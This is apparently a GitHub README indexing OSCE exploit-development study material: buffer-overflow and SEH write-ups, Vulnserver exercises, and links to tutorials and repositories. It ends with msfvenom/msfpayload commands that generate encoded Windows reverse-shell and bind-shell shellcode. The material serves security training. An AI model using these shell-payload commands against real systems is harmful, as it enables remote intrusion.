README.md

August 29, 2020 · View on GitHub

Exploit Writeups

Backdooring PE - Weaponizing Your Favorite PE
SEH + Egghunter(Manual Encoding) - HP OpenView NNM 7.5 Exploitation

Exploit Exercise (Protostar)

Module	Link	Note
Stack0	Stack BOF Intro	N/A
Stack1	Stack BOF Basic1	N/A
Stack2	Stack BOF Basic2	N/A
Stack3	Stack BOF Basic3	N/A
Stack4	Stack BOF Basic4	N/A
Stack5	Stack BOF Shellcode
Stack6	Stack BOF ret2libc	ROP is no need for OSCE
Stack7	Stack BOF ret2.text	ROP is no need for OSCE. But learn POP; POP; RET concept with this

Vulnserver (Vulnserver)

Series	Link	Command	Vulnerability	Note
Part 1	Read	N/A	N/A	Lab Setup
Part 2	Read	TRUN	EIP Overwrite
Part 3	Read	GMON	SEH Overwrite + Short JMP + Egghunter
Part 4	Read	KSTET	EIP Overwrite + Short JMP + Egghunter
Part 5	Read	HTER	EIP Overwrite + Restricted Characters + Manual Offset Finding
Part 6	Read	GTER	EIP Overwrite + Socket Reuse Exploit
Part 7	Read	LTER	SEH Overwrite + Restricted Characters + Encoded Payloads

Reviews

Techryptic - Great Tips
Jack Halon - https://jhalon.github.io/OSCE-Review/
Connor McGarr - https://connormcgarr.github.io/CTP-OSCE-Thoughts/

Github

Examples - https://github.com/dhn/OSCE
OSCE_Bible - https://github.com/mohitkhemchandani/OSCE_BIBLE
FullShade - https://github.com/FULLSHADE/OSCE (*POCs)
h0mbre - https://github.com/h0mbre/CTP-OSCE (*Good helpers)
ihack4falafel - https://github.com/ihack4falafel/OSCE

Resources

Corelan - https://www.corelan.be/index.php/articles/
- Exploit Writing Part 1 - Stack-based Overflow
- Exploit Writing Part 2 - Buffer Overflow
FuzzSecurity - http://fuzzysecurity.com/tutorials.html
SecuritySift - http://www.securitysift.com/
Fuzzing
- https://resources.infosecinstitute.com/intro-to-fuzzing/
- https://resources.infosecinstitute.com/fuzzer-automation-with-spike/
Structured Exception Handler (SEH)
Egghunter
ASLR
- Exploit Writing Part 6 - ASLR
Shellcoding
- Exploit Wrting Part 9 - Shellcoding
- https://www.fuzzysecurity.com/tutorials/expDev/6.html
- http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/
- http://www.vividmachines.com/shellcode/shellcode.html#ws
- Jumping to Shellcode - https://connormcgarr.github.io/CTP-OSCE-Thoughts/
- Alphanumeric Shellcod2 1 - https://blog.knapsy.com/blog/2017/05/01/quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/
- Alphanumeric Shellcode 2 - https://connormcgarr.github.io/Admin-Express-0day/
Opcode
- 32-bit Opcode Table - http://sparksandflames.com/files/x86InstructionChart.html
- Types of Jump - http://www.unixwiz.net/techtips/x86-jumps.html
- ASM Assembler/Dissambler - https://defuse.ca/online-x86-assembler.htm#disassembly
Web Application
- XSS - https://excess-xss.com/
- XSS - https://www.veracode.com/security/xss
Windows API
- API Tables - https://docs.microsoft.com/en-us/windows/win32/apiindex/windows-api-list

Reverse Shell

Windows XP/Vista Ultimate

/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C

Later Windows

/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C 

msfvenom -p windows/shell_reverse_tcp LHOST=1192.168.x.x LPORT=443 -a x86 --platform=win -e x86/alpha_mixed -f raw

Bind Shell

Windows XP/Vista Ultimate

msfpayload windows/shell_bind_tcp R > bind
msfencode -e x86/alpha_mixed -i bind -t perl

Later Windows

msfvenom -p windows/shell_bind_tcp -a x86 --platform=win -e x86/alpha_mixed -f perl